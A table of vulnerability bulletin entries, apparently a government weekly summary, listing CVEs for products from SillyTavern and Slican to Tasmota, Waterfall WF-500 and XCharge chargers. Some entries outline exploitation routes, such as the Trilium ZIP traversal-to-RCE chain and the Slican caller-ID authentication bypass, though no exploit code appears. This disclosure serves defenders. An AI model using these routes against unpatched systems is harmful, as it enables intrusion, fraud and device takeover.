| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, corsProxyMiddleware forwards req.params.url directly into fetch(url, ...). It only blocks circular requests to its own host and does not enforce destination allowlist or private/loopback restrictions, enabling SSRF. This vulnerability is fixed in 1.18.0. | 2026-05-29 | not yet calculated | CVE-2026-44652 | https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-ccfq-2454-f5xw |
| Slican--CCT-1668 | In Slican telephone exchanges it is possible to manage the control panel remotely. An unauthenticated attacker can connect to the modem via a telephone with a specific caller ID. This allows them to bypass admin authentication and gain full access to the service protocol and configuration panel. This vulnerability is independent of the telephone exchanges configuration. If remote access is disabled, calling with this caller ID will temporarily enable it. This issue was fixed in versions below: - IPL-256: version 6.61.0040 - IPM-032: version 6.61.0040 - CCT-1668: version 6.56.0430 - MAC-6400: version 6.56.0430 - CXS-0424: version 6.30.0510 The issue STILL EXISTS in End-Of-Life telephone exchanges in versions 4.xx and below: - CCT-1668 (CCT1CPU) - MAC-6400 - CXS-0424 These products were discontinued in 2011 and 2012 and and will not receive updates. These products require a hardware update in order to receive a software update. The vendor recommends that users of these devices contact the their service department directly to determine the options for upgrading. | 2026-05-27 | not yet calculated | CVE-2026-35090 | https://cert.pl/posts/2026/05/CVE-2026-35087 |
| Slican--IPx | Slican telephone exchanges allow administrative protocol authentication bypass. An attacker can bypass the need to enter login credentials by executing the appropriate command. This issue was fixed in versions below: - NCP: version 1.24.0250 - IPx series: version 6.61.0040 - CCT-1668: version 6.56.0430 - MAC-6400: version 6.56.0430 - CXS-0424: version 6.30.0510 The issue STILL EXISTS in End-Of-Life telephone exchanges in versions 4.xx and below: - CCT-1668 (CCT1CPU) - MAC-6400 - CXS-0424 These products were discontinued in 2011 and 2012 and and will not receive updates. These products require a hardware update in order to receive a software update. The vendor recommends that users of these devices contact the their service department directly to determine the options for upgrading. | 2026-05-27 | not yet calculated | CVE-2026-35087 | https://cert.pl/posts/2026/05/CVE-2026-35087 |
| Slican--IPx | In Slican telephone exchanges secure key is generated in a predictable manner using properties of the telephone exchange which can be obtained without authentication. An unauthenticated attacker can deduce the secure key and obtain admin credentials. This issue was fixed in versions below: - IPx series: version 6.61.0040 - CCT-1668: version 6.56.0430 - MAC-6400: version 6.56.0430 - CXS-0424: version 6.30.0510 The issue STILL EXISTS in End-Of-Life telephone exchanges in versions 4.xx and below: - CCT-1668 (CCT1CPU) - MAC-6400 - CXS-0424 These products were discontinued in 2011 and 2012 and and will not receive updates. These products require a hardware update in order to receive a software update. The vendor recommends that users of these devices contact the their service department directly to determine the options for upgrading. | 2026-05-27 | not yet calculated | CVE-2026-35089 | https://cert.pl/posts/2026/05/CVE-2026-35087 |
| SMSGate--Sms-Core | An issue in SMSGate sms-core<=2.1.13.6 allows a remote attacker to execute arbitrary code via the Cmpp7FDeliverRequestMessageCodec.java component | 2026-05-28 | not yet calculated | CVE-2026-37579 | https://github.com/wudijun/jun.github.io/blob/main/SMSGate%20deserialization%20vulnerability.md |
| SourceBans--Material Admin | An issue in SourceBans Material Admin before v.1.1.6 (3ecd95e) allows attackers to manipulate arbitrary user data in the web app via a crafted XAJAX call. | 2026-05-28 | not yet calculated | CVE-2026-30760 | https://gist.github.com/ng-dst/ca6663a4107fd39eaba1be2cb1d52b51 https://github.com/SB-MaterialAdmin/Web https://github.com/SB-MaterialAdmin/Web/issues/374 https://gist.github.com/ng-dst/450b698433f628990921f1e5ab46ff8c |
| SourceBans--Material Admin | An arbitrary file upload vulnerability in the pages/admin.uploadmapimg.php component of SourceBans Material Admin v1.1.6 allows attackers to execute arbitrary code via uploading a crafted image file. | 2026-05-28 | not yet calculated | CVE-2026-30761 | https://gist.github.com/ng-dst/ca6663a4107fd39eaba1be2cb1d52b51 https://github.com/SB-MaterialAdmin/Web https://github.com/SB-MaterialAdmin/Web/issues/374 https://gist.github.com/ng-dst/254163056c2d8a2f55259dcb79531b31 |
| SourceCodester--Doctor Appointment System 1.0 | SourceCodester Doctor Appointment System 1.0 is vulnerable to Cross Site Scripting (XSS) due to improper handling of user supplied input in the user registration functionality in register.php. | 2026-05-29 | not yet calculated | CVE-2026-36324 | https://www.sourcecodester.com/php/18453/doctor-appointment-system-using-php-and-mysql-source-code.html https://github.com/adhiyaksactf/MyCVE-Disclosures/blob/main/rems-DoctorAppointmentSystem/CVE-2026-36324/README.md |
| SpSoft--AppLock | SpSoft AppLock (com.sp.protector.free) 7.9.40 for Android allows a local attacker with physical access to bypass fingerprint or PIN authentication. Although the app integrates Android's biometric mechanisms, the lock is implemented with a custom overlay that fails to consistently enforce authentication. By navigating cascading interface flows - insecure navigation through exposed routes facilitates app control evasion {I.N.T.E.R.F.A.C.E] via advertisement or browser intents - an attacker can exit the lock interface without re-authentication and access protected apps (e.g., Chrome). This results in information disclosure and privilege escalation. | 2026-05-27 | not yet calculated | CVE-2025-68712 | https://play.google.com/store/apps/details?id=com.sp.protector.free https://github.com/actuator/com.sp.protector.free https://github.com/actuator/com.sp.protector.free/blob/main/CVE-2025-68712 |
| StrongDM--StrongDM Desktop Application | StrongDM Desktop Application before 23.74.0 (Desktop Client before 53.77.0) on Microsoft Windows stores authentication state, including a JSON Web Token and asymmetric key material, in cleartext in a per-user state file located at C:\Users\<username>\.sdm\state.kv. The file is protected only by default user-level NTFS permissions. Exploitation requires local read access to the affected user's profile directory and additional deployment and execution conditions on the target host. The condition was reported through coordinated disclosure by Hope Walker (SpecterOps). | 2026-05-29 | not yet calculated | CVE-2026-4387 | StrongDM Security Advisory |
| Suprema--BioStar 2 (server) | Incorrect permission settings on a critical resource in Suprema BioStar 2 (versions 2.9.3 through 2.9.11) that allow backup files to be publicly exposed when the administrator configures their path within the NGINX webroot. This vulnerability allows an attacker with network access to directly download backup ZIP files via 'http(s)://[server]/download/…' without requiring authentication. This exposes highly sensitive information that can lead to server impersonation, unauthorized access to databases, and lateral movement. | 2026-05-29 | not yet calculated | CVE-2026-9508 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-supremas-biostar |
| Suprema--BioStar 2 (server) | An unhandled exception in Suprema BioStar 2 (Server), versions 2.9.8, 2.9.10, and 2.9.11, that allows an unauthenticated remote attacker to cause a denial of service (DoS) by sending HTTP POST requests to the '/api/migration' endpoint. This request triggers a failure that halts critical processes, leaving the system offline until the services or server are manually restarted. As a result, access control readers cease to function, and potential failures may occur in third-party integrations. Since the exploit requires no privileges or user interaction and is trivial to automate, the impact on availability is high, and the effect extends to interconnected systems. | 2026-05-29 | not yet calculated | CVE-2026-9509 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-supremas-biostar |
| Tasmota--Tasmota | Buffer Overflow vulnerability in arendst Tasmota v.15.3.0.3 and before allows a remote attacker to execute arbitrary code via the tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino, fetch_jpg() function. | 2026-05-27 | not yet calculated | CVE-2026-38422 | https://github.com/arendst/Tasmota https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino https://github.com/sermikr0/CVE-2026-38422 |
| Tasmota--Tasmota | Buffer Overflow vulnerability in arendst Tasmota v.15.3.0.3 and before allows a remote attacker to execute arbitrary code via the xdrv_10_scripter.ino, fetch_jpg(), jpg_task.boundary[40], strcpy() function. | 2026-05-27 | not yet calculated | CVE-2026-38426 | https://github.com/arendst/Tasmota/blob/c207cc2/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino https://github.com/sermikr0/CVE-2026-38426 |
| Tasmota--Tasmota | An issue in fetch_jpg() in xdrv_10_scripter.ino in Tasmota through 15.3.0.3 allows a remote attacker to cause heap buffer overflow. The Content-Length from a JPEG stream is stored in a uint16_t variable; values above 65535 wrap around, causing allocation of a smaller buffer than the data actually read. | 2026-05-27 | not yet calculated | CVE-2026-38427 | https://github.com/arendst/Tasmota/blob/c207cc2/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino https://github.com/sermikr0/CVE-2026-38427 |
| tassos.gr--Novarain/Tassos Framework (plg_system_nrframework) | The vulnerability in the Tassos Framework Plugin allows users to delete arbitrary files on the affected sites. | 2026-05-27 | not yet calculated | CVE-2026-48906 | https://tassos.gr |
| tauri-apps--tauri | Tauri is a framework for building binaries for all major desktop platforms. From 2.0 to 2.11.0, a flaw in Tauri's is_local_url() function causes it to incorrectly classify remote URLs as trusted local origins on Windows and Android. On these systems, Tauri maps custom URI scheme protocols to http://<scheme>.localhost/ because those platforms' WebView implementations cannot serve custom URI schemes directly. The issue is that Tauri's check to see if the origin is local, only checks the first subdomain of the URL. An attacker can abuse this by hosting a page on a domain whose subdomain matches the custom scheme of the application. This vulnerability is fixed in 2.10.3. | 2026-05-27 | not yet calculated | CVE-2026-42184 | https://github.com/tauri-apps/tauri/security/advisories/GHSA-7gmj-67g7-phm9 |
| th30d4y--OpenLearnX | OpenLearnX is an open-source, decentralized learning and assessment platform. Prior to 2.0.4, a critical authentication vulnerability was identified in OpenLearnX that could allow unauthorized access to user accounts under specific conditions. This vulnerability is fixed in 2.0.4. | 2026-05-27 | not yet calculated | CVE-2026-44720 | https://github.com/th30d4y/OpenLearnX/security/advisories/GHSA-223g-f5mq-gw33 |
| Tigera--Calico | In Calico, the install-cni init container logs the rendered CNI configuration to standard output. When the configuration template uses the __SERVICEACCOUNT_TOKEN__ placeholder (Canal/Flannel-Calico deployments), the installer substitutes the live Kubernetes ServiceAccount bearer token before logging, exposing the token to any authenticated user with pods/log permission in the namespace with calico-node. The token holds patch privileges on pods/status, enabling annotation-based attacks against cluster workloads. The default kubeconfig-based authentication path is not affected. This is a direct regression of TTA-2018-001. | 2026-05-28 | not yet calculated | CVE-2026-41184 | https://github.com/projectcalico/calico/pull/12502 https://github.com/projectcalico/calico/pull/12527 https://github.com/projectcalico/calico/pull/12526 https://www.tigera.io/security-bulletins/tta-2026-001/ |
| Tigera--Calico | When Calico is configured with the Azure IPAM plugin, the Calico CNI binary mutates the incoming CNI configuration to attach subnet information before delegating to the IPAM plugin. After mutating, the Azure IPAM helper logs the entire unmarshaled configuration map (stdinData) at INFO level to /var/log/calico/cni/cni.log on every CNI ADD and DEL invocation - once per pod scheduled or terminated on the node. When the cluster is deployed using token-based Kubernetes authentication, this log entry contains the ServiceAccount token, client key, and certificate authority in plaintext. Any principal with read access to /var/log/calico/cni/cni.log on a node can read these logs and extract the credentials, which grant cluster-wide Calico networking admin privileges. | 2026-05-28 | not yet calculated | CVE-2026-41185 | https://github.com/projectcalico/calico/pull/12502 https://github.com/projectcalico/calico/pull/12527 https://github.com/projectcalico/calico/pull/12526 https://www.tigera.io/security-bulletins/tta-2026-002/ |
| Tigera--Calico | When calicoctl is invoked with --log-level=info or --log-level=debug, the client prints the full contents of its loaded connection-configuration struct to stderr in a single log line. The struct embeds every credential calicoctl uses to talk to the cluster - inline kubeconfig (with bearer token), Kubernetes API bearer token, etcd password, and inline PEM-encoded etcd client certificate and key. Any reader of that stderr stream - CI job logs, session-recording archives, shared support-ticket transcripts, or local filesystem viewers on the host that ran calicoctl - can extract these credentials with zero Kubernetes privilege. calicoctl's default log level is panic, so this issue only triggers when verbose logging is explicitly enabled. | 2026-05-28 | not yet calculated | CVE-2026-6720 | https://github.com/projectcalico/calico/pull/12535 https://github.com/projectcalico/calico/pull/12536 https://github.com/projectcalico/calico/pull/12537 https://www.tigera.io/security-bulletins/tta-2026-003/ |
| TP-Link Systems Inc.--Archer BE7200 V1 | An authenticated command injection vulnerability exists in the Archer BE450 v1 and BE7200 v1 router that allows an administrator to execute arbitrary system commands through the web management interface. After successfully authenticating to the admin interface, an attacker can leverage the browser's developer console by supplying a crafted input that is passed to backend system commands without adequate sanitization. Successful exploitation enables execution of arbitrary commands with elevated privileges on the device, which may allow the attacker to start unauthorized services, modify system configuration, or otherwise fully compromise the router's operating environment. | 2026-05-27 | not yet calculated | CVE-2026-5509 | https://www.tp-link.com/en/support/download/archer-be450/#Firmware https://www.tp-link.com/jp/support/download/archer-be450/#Firmware https://www.tp-link.com/jp/support/download/archer-be7200/#Firmware https://www.tp-link.com/us/support/faq/5102/ |
| TP-Link Systems Inc.--Archer C64 v1.0 | Due to improper enforcement of authentication rate-limiting on a debug SSH service in Archer C64 v1, the SSH service allows unlimited authentication attempts and uses the same credentials as the web interface. This enables an attacker to brute-force valid credentials via SSH. Successful exploitation could allow an attacker with adjacent network access to obtain administrative credentials through unrestricted authentication attempts and subsequently gain full administrative access to the device, impacting system confidentiality, integrity, and availability. | 2026-05-28 | not yet calculated | CVE-2026-8697 | https://www.tp-link.com/en/support/download/archer-c64/v1/#Firmware https://www.tp-link.com/us/support/faq/5105/ |
| TP-Link Systems Inc.--Tapo L535E v1.0, v3.0 | TP-Link has identified a vulnerability in Tapo L535E v1.0 and v3.0, Tapo P300 v1.0, and Tapo D100C v1.0, where Bluetooth communication during the initial setup phase is transmitted in cleartext without encryption. Bluetooth is only used during initialization. An attacker within the Bluetooth range could exploit this behavior using Bluetooth sniffing or man-in-the-middle techniques, which may allow eavesdropping on Bluetooth communication, manipulate transmitted setup data and potentially gain unauthorized control of the device during initialization. An attacker within the Bluetooth range could exploit this behavior using Bluetooth sniffing or man-in-the-middle techniques, which may allow eavesdropping on Bluetooth communication, manipulate transmitted setup data and potentially gain unauthorized control of the device during initialization. D100C is the chime delivered with your Tapo camera, and it is delivered with the following Tapo products: D130, D210, D235, D225, TD21, TDB21 and TD25 | 2026-05-28 | not yet calculated | CVE-2026-34126 | https://www.tp-link.com/us/support/download/tapo-l535e/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-l535e/v3/#Firmware-Release-Notes https://www.tp-link.com/jp/support/download/tapo-p300/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-p300/#Firmware-Release-Notes https://www.tp-link.com/jp/support/download/tapo-l535e/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5106/ |
| TP-Link Systems Inc.--TL-SG108PE v5 | A stored cross-site scripting (XSS) vulnerability has been identified in the web management interface of TP-Link's TL-SG108PE v5 switch due to improper sanitation of the SYSNAM configuration parameter during configuration file import. An attacker with administrator access can inject malicious script into the device configuration, which may be stored and executed in the administrator's browser when the affected interface is viewed. Successful exploitation may allow session cookie theft, unauthorized configuration changes, or access to sensitive information exposed through the management interface. | 2026-05-29 | not yet calculated | CVE-2026-34127 | https://www.tp-link.com/en/support/download/tl-sg108pe/v5/#Firmware https://www.tp-link.com/us/support/download/tl-sg108pe/v5/#Firmware https://www.tp-link.com/us/support/faq/5110/ |
| traccar--traccar | Traccar is an open source GPS tracking system. Prior to 6.13.0, DeviceResource.uploadImage authorizes the target device only through Condition.Permission(User.class, getUserId(), Device.class) and then immediately streams the uploaded body into mediaManager.createFileStream(...). Unlike the generic mutation path in BaseObjectResource.update and the explicit device mutation handler updateAccumulators, this route never invokes permissionsService.checkEdit(getUserId(), Device.class, false, false). The skipped guard is exactly where Traccar enforces readonly and deviceReadonly restrictions for non-admin users. An unauthorized user can replace a device's stored image file under the server media directory. This allows modification of UI-visible device media and any downstream workflows that rely on the persisted image, despite other device update paths correctly rejecting the same identity. This vulnerability is fixed in 6.13.0. | 2026-05-26 | not yet calculated | CVE-2026-44314 | https://github.com/traccar/traccar/security/advisories/GHSA-33v4-5x2g-7mjm |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. Prior to 0.102.2, a malicious ZIP archive imported with safe import enabled achieves RCE via #docName path traversal and XSS by combining a payload note (type: code, mime: text/plain) containing raw HTML/JS and a trigger note (type: doc or type: launcher) with a #docName label that uses ../ path traversal to point at the payload note's API endpoint. The desktop client Electron renderer runs with nodeIntegration enabled, so an RCE is triggered once the payload is executed. This vulnerability is fixed in 0.102.2. | 2026-05-29 | not yet calculated | CVE-2026-45668 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-9jjc-cccq-f6rh |
| ultrajson--ultrajson | UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Prior to 5.12.1, when ujson.dump() writes to a file-like object and the write operation raises an exception, the serialized JSON string object is not decremented, leaking memory. Each failed write operation leaks the full size of the serialized payload. This vulnerability is fixed in 5.12.1. | 2026-05-27 | not yet calculated | CVE-2026-44660 | https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c38f-wx89-p2xg https://github.com/ultrajson/ultrajson/commit/82af1d0ac01d09aa40c887b460d44b9d9f4bccd9 https://github.com/ultrajson/ultrajson/releases/tag/5.12.1 |
| Unknown--Eupago Gateway For Woocommerce | The Eupago Gateway For Woocommerce WordPress plugin before 4.7.2 does not properly restrict access to its refund request handler, allowing unauthenticated attackers to initiate refunds against any WooCommerce order using the merchant's payment gateway credentials, and for applicable payment methods, to redirect refunded funds to an attacker-controlled bank account. | 2026-05-28 | not yet calculated | CVE-2026-7862 | https://wpscan.com/vulnerability/b4ce2a06-b435-4b77-851f-4406f2a91ca6/ |
| Unknown--EventPress | The EventPress WordPress theme before 22.2 does not sanitize or escape the 'id' parameter in the eventpress_customizer_notify_dismiss_action AJAX handler before outputting it back in the response, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against logged-in users. | 2026-05-27 | not yet calculated | CVE-2026-6268 | https://wpscan.com/vulnerability/77192aeb-8e4b-4057-b5d7-2b95da634edd/ |
| uzy--ssm-mall--uzy-ssm-mall | SQL Injection vulnerability in uzy-ssm-mall v1.1.0 allows a remote attacker to obtain sensitive information via the ProductMapper.xml and /OrderUtil.java components | 2026-05-27 | not yet calculated | CVE-2026-38808 | https://github.com/cagexunxi/CVE/issues/3 |
| Veeam--Backup and Replication | This vulnerability in Veeam Agent for Microsoft Windows allows for Local Privilege Escalation. | 2026-05-28 | not yet calculated | CVE-2026-32996 | https://www.veeam.com/kb4852 |
| Veeam--Backup and Replication | A vulnerability allowing an authenticated user with the Backup Administrator role to write arbitrary files on Linux-based Veeam Backup & Replication server. | 2026-05-28 | not yet calculated | CVE-2026-32997 | https://www.veeam.com/kb4852 |
| Veeam--Service Provider Console | This vulnerability in Veeam Service Provider Console allows for remote code execution. | 2026-05-28 | not yet calculated | CVE-2026-32998 | https://www.veeam.com/kb4853 |
| verbb--formie | Formie is a Craft CMS plugin for creating forms. Prior to 2.2.21 and 3.1.26, unauthenticated users could modify existing submissions by posting a known or guessed submission ID to formie/submissions/save-submission. This vulnerability is fixed in 2.2.21 and 3.1.26. | 2026-05-29 | not yet calculated | CVE-2026-47266 | https://github.com/verbb/formie/security/advisories/GHSA-pgxq-p76c-x9cg https://github.com/verbb/formie/releases/tag/2.2.21 https://github.com/verbb/formie/releases/tag/3.1.26 |
| View Concept--Kidsview | A user with physical access to a smartphone can bypass authentication mechanism of Kidsview mobile application and grant himself full access to the device owner's account by interacting with application's push notification. This issue was fixed in version 4.4.3 | 2026-05-28 | not yet calculated | CVE-2026-8990 | https://cert.pl/posts/2026/05/CVE-2026-8990 https://kidsview.pl/ |
| vllm-project--vllm-project/vllm | vllm-project/vllm version 0.14.1 contains a vulnerability where the `trust_remote_code=True` parameter is hardcoded in two model implementation files (`vllm/model_executor/models/nemotron_vl.py` and `vllm/model_executor/models/kimi_k25.py`). This bypasses the user's explicit `--trust-remote-code=False` setting, enabling remote code execution via malicious HuggingFace model repositories. This issue is an incomplete fix for CVE-2025-66448 and CVE-2026-22807, as it affects separate code paths in model implementation files. Deployments loading NemotronVL or KimiK25 models are particularly impacted. | 2026-05-28 | not yet calculated | CVE-2026-4944 | https://huntr.com/bounties/97f706f7-a852-49b2-a4eb-76811e611daf |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 TX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 TX Host. | 2026-05-29 | not yet calculated | CVE-2025-41265 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41265 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 TX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 TX Host. | 2026-05-29 | not yet calculated | CVE-2025-41266 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41266 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 TX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 TX Host. | 2026-05-29 | not yet calculated | CVE-2025-41267 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41267 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-23: Relative Path Traversal in the Administration WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to delete arbitrary files on the Host machines. | 2026-05-29 | not yet calculated | CVE-2025-41268 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41268 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41269 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41269 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41270 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41270 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-23: Relative Path Traversal in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to read arbitrary files from the device. | 2026-05-29 | not yet calculated | CVE-2025-41271 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41271 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41272 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41272 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-288: Authentication Bypass Using an Alternate Path or Channel in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to bypass authentication of the Console web application and perform actions as an authenticated user. | 2026-05-29 | not yet calculated | CVE-2025-41273 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41273 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41274 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41274 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41275 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41275 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41276 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41276 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41277 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41277 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-125: Out-of-bounds Read in Waterfall WF-500 RX Host in version 7.10.0.0 R2601141040 that allows attackers with access to the TX Host to execute code on the RX Host. | 2026-05-29 | not yet calculated | CVE-2025-41278 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41278 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 RX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 RX Host. | 2026-05-29 | not yet calculated | CVE-2025-41279 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41279 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-23: Relative Path Traversal (Zip Slip) in Waterfall WF-500 RX Host in version 7.9.1.0 R2502171040 that allows attackers with access to the TX Host to execute code on the RX Host when a MySQL connector is configured and file compression is enabled. | 2026-05-29 | not yet calculated | CVE-2025-41280 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41280 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in Waterfall WF-500 RX Host in version 7.9.1.0 R2502171040 that allows attackers with access to the TX Host to execute code on the RX Host when a MySQL connector is configured. | 2026-05-29 | not yet calculated | CVE-2025-41281 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41281 |
| Webmin--Webmin | Webmin before 2.640 does not safely construct a filename for saving of an attachment within the mailboxes component. This occurs in mailboxes/detachall.cgi. | 2026-05-27 | not yet calculated | CVE-2026-49103 | https://github.com/webmin/webmin/commit/cf432879a14568c4bb44cd2f9e5a9bd0e168edc1 https://github.com/webmin/webmin/compare/2.630...2.640 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, view/update.php reads $_POST['updateFile'] as a relative path under updatedb/ and passes it to PHP's file() for line-by-line execution as part of a database migration. An authenticated administrator can abuse this to read arbitrary text files reachable from the web-server process. | 2026-05-29 | not yet calculated | CVE-2026-45731 | https://github.com/WWBN/AVideo/security/advisories/GHSA-3mjv-375j-6h92 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, an unauthenticated remote attacker can read arbitrary image files anywhere on disk that the PHP user can open - including private user-profile photos that the application's normal serving wrappers gate behind ACLs, admin-uploaded thumbnails, encrypted-video poster frames, and image content under sibling-app directories reachable via .. traversal. The endpoint requires no authentication. | 2026-05-29 | not yet calculated | CVE-2026-46337 | https://github.com/WWBN/AVideo/security/advisories/GHSA-w4qq-74h6-58wq |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, plugin/AuthorizeNet/processPayment.json.php credits the logged-in user's wallet based only on the attacker-controlled amount POST parameter. The endpoint contains a TODO for real Authorize.Net charging, hardcodes $paymentSuccess = true, and then calls YPTWallet::addBalance() without validating any Authorize.Net transaction, webhook signature, hosted payment token, nonce, or server-side payment record. This allows any logged-in user to add arbitrary funds to their own AVideo wallet when the AuthorizeNet and YPTWallet plugins are enabled. | 2026-05-29 | not yet calculated | CVE-2026-47696 | https://github.com/WWBN/AVideo/security/advisories/GHSA-9392-pj54-qqf8 |
| XCharge--C6 | A firmware update mechanism in the affected charging controller fails to validate the authenticity of firmware packages delivered through the device's management interface. Because cryptographic signatures are not verified, an attacker with the ability to interfere with or impersonate the management channel could cause the device to install an unauthorized firmware package. This condition could allow execution of unauthorized code with high privileges on the device. | 2026-05-28 | not yet calculated | CVE-2026-9037 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-08 |
| XCharge--C6 | A stack-based buffer overflow vulnerability in the charging controller's signal-processing logic allows an attacker with physical access to the charging interface to supply message fields that exceed expected bounds. Because the input is not sufficiently validated, memory corruption may occur, which can lead to execution of unauthorized code with elevated privileges. | 2026-05-28 | not yet calculated | CVE-2026-9038 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-08 |
| XCharge--C6 | A configuration weakness in the device's remote management service allows an authenticated session to be established over a communication channel intended solely for vehicle-charger signaling. The service is accessible on interfaces exposed through the charging connector, and it accepts a default administrative credential. A malicious device physically connected to the charging interface could leverage this misconfiguration to obtain full administrative access. | 2026-05-28 | not yet calculated | CVE-2026-9039 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-08 |
